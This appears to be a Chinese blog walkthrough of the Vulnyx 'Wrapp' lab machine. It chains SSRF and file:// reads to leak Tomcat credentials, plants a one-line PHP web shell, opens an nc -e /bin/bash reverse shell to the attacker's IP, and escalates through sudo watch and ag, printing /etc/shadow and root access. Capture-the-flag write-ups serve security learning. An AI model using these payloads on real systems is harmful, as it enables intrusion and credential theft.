Pepster'Blog
Vulnyx-Wrapp-Walkthrough
城南花已开 Lv6
  2025-02-27 20:53:48   2025-04-18 23:34:08    2.8k 字  16 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.215  08:00:27:0b:12:8a       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.096 seconds (122.14 hosts/sec). 4 responded
export ip=192.168.60.215
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.215:22
Open 192.168.60.215:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-27 20:54 CST
Initiating ARP Ping Scan at 20:54
Scanning 192.168.60.215 [1 port]
Completed ARP Ping Scan at 20:54, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:54
Completed Parallel DNS resolution of 1 host. at 20:54, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:54
Scanning 192.168.60.215 [2 ports]
Discovered open port 22/tcp on 192.168.60.215
Discovered open port 80/tcp on 192.168.60.215
Completed SYN Stealth Scan at 20:54, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.215
Host is up, received arp-response (0.00034s latency).
Scanned at 2025-02-27 20:54:14 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:0B:12:8A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.215
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 20]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.215/javascript/]
/advanced-search      (Status: 301) [Size: 326] [--> http://192.168.60.215/advanced-search/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

SSRF

/advanced-search有个私人搜索,可以指定跳转的网址

利用靶机去访问的,然后将返回的信息显示在页面上

1
2
3
❯ curl http://192.168.60.215/advanced-search/path.php\?path\=192.168.60.100
tail -f /var/log/nginx/access.log
192.168.60.215 - - [27/Feb/2025:20:58:53 +0800] "GET / HTTP/1.1" 200 1859 "-" "-"

但是他并不能正常解析php,只会当作文本

我尝试请求内网地址的端口

看看有没有只在本地开放的服务

模糊测试一下,利用range 模块遍历所有端口

发现本地开放65000端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ wfuzz -c -u "http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:FUZZ"  -z range,1-65535 --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:FUZZ
Total requests: 65535

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000022:   200        2 L      4 W        60 Ch       "22"
000000080:   200        1 L      2 W        20 Ch       "80"
000065000:   200        29 L     211 W      1895 Ch     "65000"

curl一下看是什么,原来是个tomcat

在文档的最下面还提示了用户定义文件在/etc/tomcat9/tomcat-users.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
❯ curl http://192.168.60.215/advanced-search/path.php\?path\=127.0.0.1:65000
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <title>Apache Tomcat</title>
</head>

<body>
<h1>It works !</h1>

<p>If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!</p>

<p>This is the default Tomcat home page. It can be found on the local filesystem at: <code>/var/lib/tomcat9/webapps/ROOT/index.html</code></p>

<p>Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with <code>CATALINA_HOME</code> in <code>/usr/share/tomcat9</code> and <code>CATALINA_BASE</code> in <code>/var/lib/tomcat9</code>, following the rules from <code>/usr/share/doc/tomcat9-common/RUNNING.txt.gz</code>.</p>

<p>You might consider installing the following packages, if you haven't already done so:</p>

<p><b>tomcat9-docs</b>: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking <a href="docs/">here</a>.</p>

<p><b>tomcat9-examples</b>: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking <a href="examples/">here</a>.</p>

<p><b>tomcat9-admin</b>: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the <a href="manager/html">manager webapp</a> and the <a href="host-manager/html">host-manager webapp</a>.</p>

<p>NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in <code>/etc/tomcat9/tomcat-users.xml</code>.</p>

</body>
</html>

再次进行模糊测试,看看65000端口下有哪些目录

发现存在manager目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ wfuzz -c -u "http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:65000/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 48
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:65000/FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000004575:   200        0 L      0 W        0 Ch        "manager"

Total time: 123.0121
Processed Requests: 10644
Filtered Requests: 10628
Requests/sec.: 86.52805

猜测可能是LFI漏洞

再次模糊测试

发现并没有,只要路径中出现空格tomcat就报错

回到之前path中,一直在想办法读取本地文件,而不是开放的网页之类的

发现可以利用file方法可以读取本地文件

尝试读一下/etc/passwd拿到用户edward henry

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
❯ curl http://192.168.60.215/advanced-search/path.php\?path\=file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash
tomcat:x:998:998:Apache Tomcat:/:/usr/sbin/nologin

读一下tomcat的用户配置文件

拿到凭证edward:3dw4RdP4zZzZzZw0rD

1
2
3
4
5
6
7
8
9
❯ curl http://192.168.60.215/advanced-search/path.php\?path\=file:///etc/tomcat9/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <user username="edward" password="3dw4RdP4zZzZzZw0rD" roles="manager-gui"/>
</tomcat-users>

用户提权

ssh连接一下

1
2
3
4
5
6
7
8
9
10
❯ ssh edward@$ip
The authenticity of host '192.168.60.215 (192.168.60.215)' can't be established.
ED25519 key fingerprint is SHA256:hdzcJbUQtwBTuPptVB40sb4fheVL1kIy30wCTBBU3a4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.215' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux wrapp 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64
edward@wrapp:~$ cat user.txt
c83fe451ef30becd77fc5ba0be044cdf

再次信息收集,只有发现/var/www/html/advanced-search这个目录权限是777

1
2
3
4
5
6
7
edward@wrapp:/var/www/html$ ls -al
total 16
drwxrwxrwx 3 root root 4096 abr 21  2023 .
drwxr-xr-x 3 root root 4096 jul 27  2021 ..
drwxrwxrwx 2 root root 4096 abr 21  2023 advanced-search
-rwxrwxrwx 1 root root   20 abr 21  2023 index.html

估计是要重新拿个www-data的shell了

改一下文件

1
2
3
edward@wrapp:/var/www/html/advanced-search$ vi index.php
<?=`$_GET[0]`?>
edward@wrapp:/var/www/html/advanced-search$ curl "http://127.0.0.1/advanced-search/index.php?0=nc%20-e%20/bin/bash%20192.168.60.100%204444"

Root提权

监听端口

利用watch提权至henry用户

同时henry用户也有sudo权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ pwncat-cs -lp 4444
[22:00:01] Welcome to pwncat 🐈!                                   __main__.py:164
[22:00:30] received connection from 192.168.60.215:45922                bind.py:84
[22:00:46] 192.168.60.215:45922: registered new host w/ db                                                                                             manager.py:957
(local) pwncat$
(remote) www-data@wrapp:/var/www/html/advanced-search$ sudo -l
sudo: unable to resolve host wrapp: Name or service not known
Matching Defaults entries for www-data on wrapp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on wrapp:
    (henry) NOPASSWD: /usr/bin/watch
(remote) www-data@wrapp:/var/www/html/advanced-search$ sudo -u henry /usr/bin/watch -x sh -c 'reset; exec sh 1>&0 2>&0'
sudo: unable to resolve host wrapp: Name or service not known
henry@wrapp:/var/www/html/advanced-search$ sudo -l
sudo: unable to resolve host wrapp: Name or service not known
Matching Defaults entries for henry on wrapp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on wrapp:
    (root) NOPASSWD: /usr/bin/ag

可以以root身份执行/usr/bin/ag

/usr/bin/ag 是 The Silver Searcher 的可执行文件,简称 ag。The Silver Searcher 是一个快速的代码搜索工具,类似于 grepack,但速度更快2。它专为开发者设计,用于在代码库中快速查找匹配的文本模式。

那就可以利用这个进行文件读取

尝试读一下shadow

1
2
3
4
5
6
7
8
9
10
11
12
13
henry@wrapp:/var/www/html/advanced-search$ sudo /usr/bin/ag -A 10 root /etc/shadow
sudo: unable to resolve host wrapp: Name or service not known
1:root:$6$y1FOTyQcKrevvFd5$3KiZpinnULXo5m/MEItTo8.o99Ck.cN8RKA2cNClGnY/LtSSuNgIg31TUAcxZyHwh0kzm5x.UoIW7sLGly4m30:19468:0:99999:7:::
2-daemon:*:18835:0:99999:7:::
3-bin:*:18835:0:99999:7:::
4-sys:*:18835:0:99999:7:::
5-sync:*:18835:0:99999:7:::
6-games:*:18835:0:99999:7:::
7-man:*:18835:0:99999:7:::
8-lp:*:18835:0:99999:7:::
9-mail:*:18835:0:99999:7:::
10-news:*:18835:0:99999:7:::
11-uucp:*:18835:0:99999:7:::

那利用通配符直接读root flag了

1
2
3
4
5
henry@wrapp:/var/www/html/advanced-search$ sudo /usr/bin/ag  -A 10 ".*" /root/root.txt
sudo: unable to resolve host wrapp: Name or service not known
1:64e6665993d04ec49cb88ffa7e6df4eb
2-

可以通过参数--pager指定分页程序

这里可以直接执行命令

1
2
3
4
5
6
7
8
9
10
11
henry@wrapp:/var/www/html/advanced-search$ stty: 'standard input': Inappropriate ioctl for device
hostname: Name or service not known
bash: line 12: ifconfig: command not found
--------------------------------------------
#监听端口
❯ pwncat-cs -lp 4444
(local) pwncat$
(remote) root@wrapp:/var/www/html/advanced-search# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@wrapp:/var/www/html/advanced-search# cat /root/root.txt
64e6665993d04ec49cb88ffa7e6df4eb
  1. 信息收集
    1. 服务探测
    2. SSRF
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
    2. SSRF
  2. 用户提权
  3. Root提权